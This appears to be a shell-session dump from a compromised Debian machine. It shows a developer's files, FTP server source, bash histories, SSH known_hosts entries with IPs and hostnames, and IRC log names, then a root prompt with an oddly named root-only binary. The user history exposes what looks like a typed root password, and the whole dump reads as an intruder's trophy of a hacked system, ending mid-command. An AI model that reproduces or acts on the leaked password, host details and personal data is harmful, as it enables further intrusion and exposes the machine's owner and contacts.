-rw-r--r-- 1 rave rave 15229 Aug 14 17:58 ssl.bk -rw------- 1 rave rave 915 Aug 16 21:51 ssl.cnf -rw------- 1 rave rave 1024 Aug 16 21:52 ssl.rnd ---------- 1 rave rave 518 Aug 16 19:45 ssl_error.txt -rw-r--r-- 1 rave rave 615307264 Aug 6 02:17 ubuntu-5.04-install-i386.iso drwxr-xr-x 9 rave rave 4096 Aug 15 03:54 vsftpd-2.0.3 drwxr-xr-x 17 root root 4096 Aug 14 21:08 wzdftpd-0.5.2 rave@debian:~$ cat hello.c #define __KERNEL__ //#define MODULE #include #include MODULE_LICENSE("Dual BSD/GPL"); static int hello_module(void) { printk(KERN_ALERT, "<1>Hello, world\n"); return 0; } static void cleanup(void) { printk(KERN_ALERT,"<1>Goodbye cruel world\n"); } module_init(hello_module); module_exit(cleanup); rave@debian:~$ cat cmds/port.c /*************************************************** ** Source code owned by rosiello security. For bugs ** Contact rave@rosiello.org ****************************************************/ #include #include #include #include #include #include #include #include #include #include #define USE_IPV6 #include #include #include #include #include #include #include #include #include extern SESSION *ses; extern struct momba irc; static void filter_port(char *str, int *prt,char *ip) { int a[4]; int high,low; sscanf(str, "%d,%d,%d,%d,%d,%d",&a[0],&a[1],&a[2],&a[3],&low,&high); snprintf(ip,20, "%d.%d.%d.%d",a[0], a[1], a[2], a[3]); (*(int *)prt) = ((low&0xFF)<<8)|(high&0xFF); return ; } int port (void) { char ip[128]; int prt; clean (ip); prt = 0; if ( irc.argc == 1 && s_strnlen(irc.argv[1], sizeof(ip)-1) >=20) s_send (ses ->fd, MSG_PORTFAIL); /* Anon users are not allowed to abuse port bounces if (c ->u_anon == yes && !strcmp(c ->ip, ip)) s_send (ses ->fd, MSG_PORTFAIL); */ filter_port(irc.argv[1], &prt, ip); ses ->req_port = prt; mcpy(ses ->req_host , ip); ses ->c_type = CON_TO; ses ->req_prot = IPv4; s_send(ses ->fd, MSG_PORTOK); return 0; } //EPRT |2|::1|33107| int eprt(void) { int protocol, port; char ip[INET6_ADDRSTRLEN+1]; char **p, *k; int i = 0; clean(ip); p = &irc.argv[1]; while ((k=strsep(p, "|"))) { if (k) switch (i) { case 1: protocol = atoi(k); break; case 2: strncpy(ip, k, INET6_ADDRSTRLEN); break; case 3: port = atoi(k); break; } ++i; } snprintf(ses ->req_host, 127, "%s", ip); ses ->req_port = port; ses ->req_prot = protocol; ses ->c_type = CON_TO; s_send(ses ->fd, MSG_PORTOK); return 0; } /************************************************** ** PASSIVE (PASV) ** ** This command requests the server-DTP to "listen" on a data ** port (which is not its default data port) and to wait for a ** connection rather than initiate one upon receipt of a ** transfer command. The response to this command includes the ** host and port address this server is listening on. */ int pasv(void) { struct sockaddr_in name; socklen_t namelen = sizeof(name); unsigned long host; long prt; /* ** Cleaning up old listening/bounded socket(s) */ if ( ses ->req_fd ) net_close(ses ->req_fd); /* We have a port range between 1024 and 1350, ** for incomming connections */ for ( prt = 1040; prt < 5999; prt++) { /* Bind to port but do NOT listen (FALSE) */ if ((ses ->req_fd = net_listenses("0.0.0.0", prt, TRUE))) break; } if ( ses ->req_fd == -1) return s_send(ses ->fd, MSG_PASVFAIL); getsockname((int) 1, (struct sockaddr *) & name, (socklen_t *) & namelen); /* Replace */ host = inet_addr("192.168.0.6");//(unsigned long)name.sin_addr.s_addr; ses ->c_type = CON_FROM; ses ->req_port = prt; /* h00ba h00ba, its magic */ s_send(ses ->fd, MSG_PASVOK, ((host & 0x000000FF) ), ((host & 0x0000FF00) >> 8), ((host & 0x00FF0000) >> 16), ((host & 0xFF000000) >> 24), (prt & 0xFF00) >> 8, (prt & 0x00FF)); return 0; } int epasv(void) { long prt; /* ** Cleaning up old listening/bounded socket(s) */ if ( ses ->req_fd != -1 ) net_close(ses ->req_fd); /* We have a port range between 1024 and 1350, ** for incomming connections */ for ( prt = 1040; prt < 5999; prt++) { /* Bind to port but do NOT listen (FALSE) */ if ((ses ->req_fd = net_listenses("0.0.0.0", prt, TRUE)) >0) break; } if ( ses ->req_fd == -1) return s_send(ses ->fd, MSG_EPASVFAIL); ses ->c_type = CON_FROM; ses ->req_port = prt; //s_send(ses ->fd, "220 %d %d",ses ->req_fd, prt); /* h00ba h00ba, its magic */ s_send(ses ->fd, MSG_EPASVOK, ses ->req_port); return 0; } int spsv(void) { struct sockaddr_in sin; #ifdef HAVE_IPV6 struct sockaddr_in6 sin6; #endif int high = 5999U; int low = 1040U; int i = 0, port; int fd; if ( irc.argc > 1 ) if ((strcmp(irc.argv[1], "all") == 0) || (strcmp(irc.argv[1], "ALL")==0)) ses ->epsv_all = yes; /* Sir, can you pass me the information cheet plz */ sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; #ifdef HAVE_IPV6 sin6.sin6_family = AF_INET6; sin6.sin6_addr = in6addr_any; #else sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; #endif do { // We have 4 trys to to make this work so hope for the best.. /* Generate random port number between 1040 and 5999 */ port = low + rand() % (high - low)+1; /* This scenario should almost never happen */ if ( port < low ) port = high - low; #ifdef HAVE_IPV6 sin6.sin6_port = htons(port); fd = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); bind(fd, (struct sockaddr *)&sin6, sizeof(sin6)); #else sin.sin_port = htons(port); fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); bind(fd, (struct sockaddr *)&sin, sizeof(sin)); #endif if ( listen (fd, 1) != -1 ) break; ++i; } while( i < 14); ses ->c_type = CON_FROM; ses ->req_fd = fd; ses ->req_port = port; s_send(ses ->fd, MSG_EPASVOK, ses ->req_port); return 0; } rave@debian:~$ ls * 20050729-Floortje.JPG amaroK.pm config-2.4.27-2-386 fd jatx.bmp ndiswrapper_1.1-4.diff.gz o.ogg rfc2228.txt server.key.pem ssl.bk ssl_error.txt Makefile amarok_window.pl d hello.c jatx.jpg ndiswrapper_1.1-4.dsc passwd rfc2228_2.txt server.req.pem ssl.cnf ubuntu-5.04-install-i386.iso aclocal.m4 amarok_xchat.pl everyday.jpg hello.o montagnes_001.jpg ndiswrapper_1.1.orig.tar.gz ptracetest.c.html server.cert.pem spca5xx-20050701.tar ssl.rnd CVS: Entries Entries.Log Entries.Static Repository Root Desktop: Downloads TODO TODO~ Trash docs fuck.php.jpg~ fuck.php~ fuck2.php~ rein wiki Destkop: Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad Religion-The Answer.mp3 sensation3 cmds: CVS fscmds.c info.c list.c ls.c port.c syst.c transfer.c users.c devforum: db scripts downloads: Bad Religion Bad Religion-Change Of Ideas-1.mp3 Bad Religion-I Want To Conquer The World.mp3 Bad Religion-Supersonic.mp3 extreme2.tar Bad Religion-Cant Stop It.mp3 Bad Religion-Change Of Ideas.mp3 Bad Religion-Modern Man.mp3 Bad Religion-The Answer.mp3 sensation3 extra: CVS ftppasswd ftpwho extreme: AUTHORS COPYRIGHTS Doxyfile Makefile.am NEWS README.ssl TODO~ aclocal.m4.save conf config.h.in config.status configure.in extreme la.c man modules src stamp-h.in AUTHORS~ CVS INSTALL Makefile.cvs README TEAM Working aclocal.m4~ config.guess config.h.in~ config.sub configure.in~ extreme2-0.1 la.c.save missing scripts ssl COPYING Changelog Makefile Makefile.in README.Team TODO aclocal.m4 autom4te.cache config.h config.log configure depcomp install-sh ltmain.sh mkinstalldirs select.c stamp-h extreme2: CVS src ftppasswd: ftppasswd.c gFTPd: images src gnome: 1 1.c 2 2.c 3 3.c DEPS jatx: - COPYRIGHTS CVS Changelog LOGO Makefile README TODO autom4te.cache config.h config.h.in config.h.in~ config.log config.status configure configure.in headers man script src modules: CVS Makefile la mod_example.c mod_site.c mod_site.so mod_smnt.c mod_smnt.so mod_warez.c mod_warez.so ndiswrapper-1.1: AUTHORS ChangeLog INSTALL Makefile README debian driver ndiswrapper.8 ndiswrapper.spec utils version spca5xx-20050701: CHANGELOG INSTALL Makefile README README-TV8532 RGB-YUV%2fmodule-setting cutlog.py drivers spca5xx.ko spca5xx.mod.c spca5xx.mod.o spca5xx.o vsftpd-2.0.3: AUDIT FAQ REFS TUNING builddefs.h filestr.c hash.c ls.h parseconf.h prelogin.h secbuf.c standalone.c sysdeputil.h tunables.c vsftpd.8 BENCHMARKS INSTALL REWARD access.c debian filestr.h hash.h main.c port privops.c secbuf.h standalone.h sysstr.c tunables.h vsftpd.conf BUGS LICENSE RedHat access.h defs.h ftpcmdio.c ipaddrparse.c netstr.c postlogin.c privops.h secutil.c str.c sysstr.h twoprocess.c vsftpd.conf.5 COPYING Makefile SECURITY ascii.c dummyinc ftpcmdio.h ipaddrparse.h netstr.h postlogin.h privsock.c secutil.h str.h sysutil.c twoprocess.h vsftpver.h COPYRIGHT README SIZE ascii.h features.c ftpcodes.h logging.c oneprocess.c postprivparent.c privsock.h session.h strlist.c sysutil.h utility.c xinetd.d Changelog README.security SPEED banner.c features.h ftpdataio.c logging.h oneprocess.h postprivparent.h readwrite.c ssl.c strlist.h tcpwrap.c utility.h EXAMPLE README.ssl TODO banner.h filesize.h ftpdataio.h ls.c parseconf.c prelogin.c readwrite.h ssl.h sysdeputil.c tcpwrap.h vsf_findlibs.sh wzdftpd-0.5.2: AUTHORS INSTALL NEWS TLS.ReadMeFirst acinclude.m4 bootstrap config.sub debian init.d libwzd-auth ltmain.sh missing src wzd-config.in ylwrap COPYING Makefile.am Permissions.ReadMeFirst UPGRADING aclocal.m4 config.guess configure depcomp install-sh libwzd-base m4 mkinstalldirs tests wzd.m4 ChangeLog Makefile.in README ac-helpers backends config.h.in configure.in doc libwzd libwzd-perl man modules tools wzd_tls.cnf rave@debian:~$ rave@debian:~$ cat .bash_history pico msg.c make make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c make man toupper pico ssl.c make pico headers/essl.h make make make clean make pico ssl.c pico headers/essl.h pico ssl.c pico headers/essl.h make pico headers/essl.h pico ssl.c make pico headers/essl.h make pico ssl.c make pico ssl.c make pico ssl.c make pico ssl.c gedit ssl.c make gedit ssl.c make make clean make pico libconf.c pico libconf.c make make make clean make pico transfer.c make make clean make pico fsio.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make pico libpasswd.c make make make make clean make pico help.c make pico libconf.c pico list.c make pico net.c make pico signal.c pico signal.c make make clean make pico mod_main.c pico mod_main.c pico mod_main.c make make make clean make pico sesdb.c make pico sesdb.c maek make pico sesdb.c make pico sesdb.c make pico sesdb.c make pico sesdb.c make pico sesdb.c make ./eftpd -P la make clean make pico port.c make make make clean make pico libconf.c make make make make clean make pico signal.c pico headers/sigdef.h make pico main.c make pico main.c make pico headers/sigdef.h pico signal.c pico main.c make pico signal.c make make clean make make clean make fgrep confi libconf.c make clean make pico ../Changelog pico ../Changelog pico ../Changelog cvs add ../Changelog cd .. cvs commit cvs commit pico ../Changelgo pico Changelog cvs commit cat ChangeLog rm ChangeLog cvs remove ChangeLog make distclean cvs remove config.h cvs commit ./configure make ls cd ssl ls pico Makefile.in cd ../src ls cp -r cmds ~/cmds cd cmds rm * ls cd .. cvs remove cmds/* ls cvs remove cmds/* cvs remove cmds cvs commit rmdir cmds rmdir -r cmds rm -r cmds cvs commit cvs remove cmds mkdir cmds cvs remove cmds cp -r ~/cmds/CVS cmds cvs remove cmds cvs commit cd src cd cmds ls cd CVS ls pico Entries make cd .. ls cd .. cvs remove cmds cvs commit make cd .. ./configure make cd src make ls make clean make cvs remove cmds cvs commit rm cmds cd cmds ls cd CVS ls cat Entries cd .. ls cd ../extra ls cd CVS cat Entries cd .. ls cd .. ls cvs help rm cvs help rmdir cvs help rmdir | grep rm cvs help remove cvs remove help ls rm -rf cmds cvs commit ls cd CVS ls pico Entries cvs commit cd .. cvs commit cvs rm ./cmds mkdir cmds cvs rm ./cmds cp -r ~/cmds ./ cd cmds/CVS ls pico Entries cd .. cd .. cp -r ~/cmds ./ cd cmds/CVS pico Entries cd ../.. cvs rm ./cmds cp -r CVS ~ cd CVS pico Entries cd .. cvs commit make make clean make ls cp -r extra ~ cvs remote extra cvs remove extra cd extra ls rm -r * ls cvs update cd .. cp ~/extra ./ cp -r ~/extra ./ cd extra ls cd ftppasswd ls rm main.c cd ../ftpwho ls ftp *.c rm *.c ls rm Makefile Makefile.in ls rm ftpwho ls cd ../../ cvs remove extra cvs commit ls cd CVS ls pico Entries cat Root cd /tmp ls rm -r extreme export CVSROOT=:ext:rave@192.168.0.2:/cvsroot export CVS_RSH=ssh cvs co extreme cd extreme ls ./configure make make encpem ls cd src ls ./rftpd -P la ./eftpd -P la ls pico ssl.c exit ftp localhost 1032 ssh root@192.168.0.2 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ls ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 pico headers/general.h ftp localhost 1032 ftp localhost 1032 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 ftp localhost 1033 cd /tmp cd extreme ls export CVSROOT=:ext:rave@192.168.0.2:/cvsroot export CVS_RSH=ssh cvs checkout extreme cp -R extreme CVS ~/extreme cd extreme/src ls cd .. cd .. cp -r extreme ~ cd extreme/ssl ls ftp localhost ftp localhost 1032 exit ssh root@192.168.0.10 ssh root@192.168.0.2 exit id ls exit cd extreme/conf pico Makefile.am cd ../ssl pico Makefile.in cd ../modules pico Makefile ls ls *.so pico Makefile make install su ssu supp3rmaninspace su pwd mkdir /tmp/./kde-root su rmdir ~/tmp/./kde-root: rmdir /tmp/./kde-root: touch /tmp/./kde-root: touch /tmp/./kde-root rmdir /tmp/./kde-root touch /tmp/./kde-root su ls -l /tmp/./kde-root chmod 777 /tmp/./kde-root: chmod 777 /tmp/./kde-root su su - ls /usr/bin/su /usr/sbin/su locate su locate su | grep bin sudo -u root sudo -u root bash sudo -u root bash ls sudo root bash su su --version ls ls /usr/bin ls /usr/bin/su ls /usr/sbin/su pico Makefile pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make uninstall pico Makefile make make uninstall pico Makefile make uninstall make uninstall make uninstall ls make pico Makefile make uninstall pico ../conf/ftpd.conf pico headers/libconf.h cd ../src pico headers/libconf.h pico libconf.c pico headers/libconf.h pico libconf.c make pico ssl.c make ./eftpd -P la -tls pico ../conf/ftpd.conf pico ssl.c make cd ,, cd .. make distclean ./configure make ./configure cd src ./eftpd -P la ./eftpd -P la -tls pico ../ftpd.conf pico ../conf/ftpd.conf ls /etc/extreme/ssl pico ../conf/ftpd.conf make ./eftpd -P la -tls ./eftpd -P la -tls ./eftpd -P la -tls pico ssl.c make ./eftpd -P la -tls pico libconf.c pico libconf.c pico ../conf/ftpd.conf make ./eftpd -P la -tls ./eftpd -P la -tls ./eftpd -P la -tls LS ls exit exit rave@debian:~$ cat .ssh/known_hosts 192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc= localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAw9yp5U83EGtwqLclFxRLLuJYdQzWDQi2pag5CXDHwAFyhycGrv4ebLg5YRfriqVo1oXZ6FDkF82k5MTdSK4ZSjoL9EeTLPFNkdmnA04wvpUZo5AneklofNOQTdYXqYbFJ3/9uZMBzotqRHwwJ5b7wudFeVMwjEVqOd7wlD4346k= dreamcatcher.rosiello.net,195.240.197.240 ssh-dss AAAAB3NzaC1kc3MAAACBAJeXU03HFAPzuU/3bAbXLzNsj1IygOfXo6dKLCAoKP57gPI/XdIAA9X2dOVi3jzCc7yZrBRF+Yw6QgNvheNuosGOCs/p99WNEkfltHLTjcJYxGaL/Ity1CEehw4NlLASfaNMPpdrSyeDOOopB93BTItaow3MS9sfojgcinMZeykjAAAAFQCDnHm5p7PoNI1zVJpn6fVceFOmpwAAAIB0lvMUE5BxldC6/VSvc7GFy3sgXUDvfgn42YdRuLOhygAvf3rnQSHa6EdQz//k0S55p0urNo4M1JsBfWddy6QS9cc/t92oV6QzwjBnNGjXK0lReeBGl9Ddwye2Bv0K5dHyoV/+Bl1aSx/qkQhqkxNDPfcJCVDyXDHsWiZ8xtGQGgAAAIB5dafQF57jW6SBJkkoy/dUdxHPOJkG4iqd/V2B0Pc8TPfOBnZD6XznInwXjC7xtWJYqyDpWFsVS2ErUAIy/EjLmpIBugS4LmoZhwZtrZOlrGcOc2JO5V+lHOQHAeAFsKGAh/x7bwZOk/q54uooz3UW+UfDaymsTAOJleE1EM8NqA== 216.194.59.8 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= 216.194.60.78 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= 216.194.1.198 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= 216.194.3.249 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= 192.168.0.10 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuVJfv6i/QvPVq0P4tFwTVeam2ihk8P1UVbnYLJglxI+BBckk3t9M7M+IU/Mqx+OQSjx+SEsqwuwKL/3BsisKx/COKsijBD8gpHFmYrY2oaQsx1uodQj1sJWbHYUv8eHOFK9yK9/8PX3GKaLaiAl1+KPHfNANLne5UEvPE3GOS5s= www.rosiello.net,212.127.146.168 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuVJfv6i/QvPVq0P4tFwTVeam2ihk8P1UVbnYLJglxI+BBckk3t9M7M+IU/Mqx+OQSjx+SEsqwuwKL/3BsisKx/COKsijBD8gpHFmYrY2oaQsx1uodQj1sJWbHYUv8eHOFK9yK9/8PX3GKaLaiAl1+KPHfNANLne5UEvPE3GOS5s= 216.194.1.8 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA6drFR2juh7xY5FVMlo/YLILANlhT+ViLZbdLGgOYegzAaEF8s3GS76o46CRewYmcve/lLWd+XTWNjU3cMYLjzM8vzjqCA6qCN7o9xVBXJuySKfbF85G+leeAPeflfiRNEbR6FKBUym4bF5+8O+oHr1dB+WwoZcTyl2bf2v6X7O0= rave@debian:~$ ls .xchat2/downloads/ EFTPD.JPG ROSIELLO.JPG Terminator_3_parody.mpeg extreme.tar.gz icancureal1.JPG rosiello1.JPG.1 rosiello2.JPG.1 strace.txt teamwp1.bmp.1 Liam_Lynch_-_(This_is_My_)_United_States_of_Whatever.mp3 Shield_JustAnotherDay_themesong.mp3 eftpd_1 icancureal.JPG rosiello1.JPG rosiello2.JPG rosiello3.JPG teamwp1.bmp wallpapereftpd.jpg rave@debian:~$ cat .xchat2/downloads/strace.txt ********************************************** Program name: G:\cygwin\home\Hooijkaas\extreme\extreme\src\eftpd.exe (pid 1116, ppid 1) App version: 1005.18, api: 0.132 DLL version: 1005.18, api: 0.132 DLL build: 2005-07-02 20:30 OS version: Windows NT-5.1 Heap size: 402653184 Date/Time: 2005-08-10 21:51:56 ********************************************** 415 1783 [main] eftpd 1116 set_myself: myself->dwProcessId 1116 93 1876 [main] eftpd 1116 time: 1123703516 = time (0) 652 2528 [main] eftpd 1116 environ_init: 0x10010238: !::=::\ 64 2592 [main] eftpd 1116 environ_init: 0x10010248: !C:=C:\Documents and Settings\Hooi 577 15299522 [main] eftpd 1116 pinfo::maybe_set_exit_code_from_windows: pid 1116, exit value - old 0x8000FF00, windows 0xDEADBEEF, cygwin 0x8000FF00 rave@debian:~$ ls .xchat2/xchatlogs/ Debian Servers-#debian.log NETWORK-.log irc.cad-net.org-.log rosiello-#humpmeg.log rosiello-cold.log rosiello-mystic.log rosiello-tradebot.log Debian Servers-#ubuntu-nl.log NETWORK-ajaxinc.log irc.cad-net.org-ajhacksu.log rosiello-#juice.log rosiello-cold__.log rosiello-nanonyme.log rosiello-vegas.log Debian Servers-bob_.log NETWORK-cadnet.log irc.cad-net.org-cadnet.log rosiello-#m00zfucked.log rosiello-darkeagle.log rosiello-nih.log rosiello-vinivici.log Debian Servers-celeron.log NETWORK-dreamcatcher.log irc.cad-net.org-cereal.log rosiello-#mcomp.log rosiello-dreamcatcher.log rosiello-ome.log rosiello-zeedo.log Debian Servers-debian servers.log NETWORK-gadfly.log irc.cad-net.org-furcalor.log rosiello-#merge.log rosiello-dreamcatcher}.log rosiello-openkay.log rosiello-zshzn.log Debian Servers-excalibur.log NETWORK-hackthissite.log irc.cad-net.org-iolaus.log rosiello-#newest.log rosiello-equiraptor.log rosiello-openmind.log zerolimit-#c.log Debian Servers-yvonne.log NETWORK-iceshaman.log irc.cad-net.org-irc.cad-net.org.log rosiello-#news.log rosiello-garbage.log rosiello-phax.log zerolimit-.log NETWORK-#admin.log NETWORK-nih.log irc.cad-net.org-jmoschetti45.log rosiello-#newsroom.log rosiello-garbage__.log rosiello-piratebay.log zerolimit-bryno.log NETWORK-#arson.log NETWORK-outthere.log irc.cad-net.org-nih.log rosiello-#r00t.log rosiello-giosoul.log rosiello-pixie.log zerolimit-kate.log NETWORK-#dhell.log NETWORK-saxdax.log irc.cad-net.org-nizzy.log rosiello-#rosiello.log rosiello-hello.log rosiello-plank.log zerolimit-kay.log NETWORK-#hacking.log NETWORK-server.log irc.cad-net.org-ph1x.log rosiello-.log rosiello-hyp.log rosiello-qeed.log zerolimit-kfraction.log NETWORK-#juice.log NETWORK-spaz.log irc.cad-net.org-qeed.log rosiello-_nemesis_.log rosiello-hypnosses.log rosiello-r00t.log zerolimit-knowledge.log NETWORK-#lobby.log NETWORK-windo.log irc.cad-net.org-qeed_.log rosiello-_nemesis|out_.log rosiello-iceshaman.log rosiello-random832.log zerolimit-linkd.log NETWORK-#niosovare.log irc.cad-net.org-#crazyass.log irc.cad-net.org-strokerace.log rosiello-_nemesis|zzzz_.log rosiello-ilja.log rosiello-rave.log zerolimit-lordneon.log NETWORK-#nullcode.log irc.cad-net.org-#fromadia.log irc.cad-net.org-zarathustra.log rosiello-angelo.log rosiello-jimmyj.log rosiello-rosiello-security-network-(rsn).log zerolimit-micmast.log NETWORK-#rootthisbix.log irc.cad-net.org-#juice.log rosiello-#admin.log rosiello-arphetic.log rosiello-jmoschetti45.log rosiello-rosiello.log zerolimit-nih.log NETWORK-#rootthisbox.log irc.cad-net.org-#mcomp.log rosiello-#c.log rosiello-atnnn.log rosiello-kay.log rosiello-saxa.log zerolimit-phax.log NETWORK-#rootx.log irc.cad-net.org-#music.log rosiello-#crazyass.log rosiello-b0f.log rosiello-link.log rosiello-skills.log zerolimit-throvold.log NETWORK-#rosiello.log irc.cad-net.org-#neworder.log rosiello-#devteam.log rosiello-bot.log rosiello-lordscav.log rosiello-tech-.log zerolimit-zerolimit.log NETWORK-#taco.log irc.cad-net.org-#offside.log rosiello-#geek.log rosiello-br00k.log rosiello-micmast.log rosiello-the_mystic.log rave@debian:~$ echo "oooh.. nice" oooh.. nice debian:~# ls 0x1c1 dbootstrap_settings install-report.template debian:~# ls -la total 640 drwxr-xr-x 13 root root 4096 Aug 13 22:43 . drwxr-xr-x 22 root root 4096 Aug 17 22:05 .. -rw------- 1 root root 100 Aug 13 21:13 .Xauthority drwx------ 2 root root 4096 Jul 31 22:34 .aptitude -rw------- 1 root root 9026 Aug 18 21:03 .bash_history -rw-r--r-- 1 root root 412 Dec 15 2004 .bashrc -rw-r--r-- 1 root root 6617 Aug 4 20:41 .fonts.cache-1 drwx------ 3 root root 4096 Aug 16 23:51 .gconf drwx------ 2 root root 4096 Aug 16 23:52 .gconfd drwx------ 2 root root 4096 Jul 31 23:43 .gnome drwx------ 3 root root 4096 Aug 3 23:25 .gnome2 drwx------ 2 root root 4096 Jul 31 23:46 .gnome2_private drwxr-xr-x 2 root root 4096 Aug 6 03:20 .gstreamer-0.8 drwx------ 2 root root 4096 Aug 7 16:11 .mozilla -rw------- 1 root root 93 Aug 18 20:52 .nano_history -rw-r--r-- 1 root root 110 Nov 10 2004 .profile -rw------- 1 root root 472 Aug 3 22:41 .recently-used -rw------- 1 root root 1024 Aug 14 19:25 .rnd drwx------ 2 root root 4096 Aug 1 01:42 .ssh drwx------ 3 root root 4096 Aug 17 22:09 .synaptic drwxr-xr-x 4 root root 4096 Aug 4 21:41 .wine ---x-----x 1 root root 542912 Aug 12 00:00 0x1c1 -rw-r--r-- 1 root root 174 Jul 31 22:31 dbootstrap_settings -rw-r--r-- 1 root root 1336 Jul 31 22:31 install-report.template debian:~# cat .bash_history pico Makefile make cd /usr/src/kernel-headers-`uname -r` pwd cd $OLDPWD ls pico Makefile make pico Makefile make insmod hello.o dmesg make rm hello.o make make all gcc -c hello.o gcc -c hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386 gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/ gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include make all ls ping 216.194.2.206 ssh 216.194.2.206 pico hello.c make gcc -c hello.c -I gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386 gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include pico hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg insmod hello.o -o hello.ko gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include -o hello.ko insmod hello.ko dmesg gcc -o hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include -o hello.ko gcc -o hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O3 hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O3 -g hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o3 -g hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -ohello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -o hello.ko -I/usr/src/kernel-headers-2.6.8-2-386/include hello.c gcc -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -02 -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include gcc -O2 -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o gcc -O2 -g -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o ls gcc -O2 -g -O -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg make hello cc -O2 -g -O -c hello.c -I/usr/src/kernel-headers-2.6.8-2-386/include insmod hello.o dmesg ls insmod ./hello.o ls cd modules ls ./sslsetup.sh wget http://cold.lubsecurity.org/stuff/sslsupport/ssl/ca.key ./sslsetup.sh exit cd /etc/eftpdssl cp cert-dummy.pem server.pem exit cat transfer.log ftp localhost 1032 cd /etc/eftpd ls cd /etc/eftp cd /etc/ ls ifconfig ls | grep ftp cd eftpdssl openssl genrsa -des3 -out server.key 1024 ls pure-ftpd pureftpd ls cp server.key ca.key ftp localhost cat /etc/init.d cat /etc/initd.conf cat /etc/inetd.conf /usr/sbin/ftpd /usr/sbin/in.ftpd ftp localhost dmesg tail /var/log/syslog /usr/sbin/in.ftpd --help /usr/sbin/in.ftpd -h man in.ftpd pico /etc/inetd.conf killall inetd inetd ftp localhost tail /var/log/syslog killall ftpd killall /usr/sbin/in.ftpd killall in.ftpd tail /var/log/syslog ftp lcoalhost man in.ftpd base-config openssl req -new -x509 -days 365 -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem openssl req -new -x509 -days 365 -nodes -config stunnel.cnf -out stunnel.pem -keyout stunnel.pem openssl req -new -x509 -days 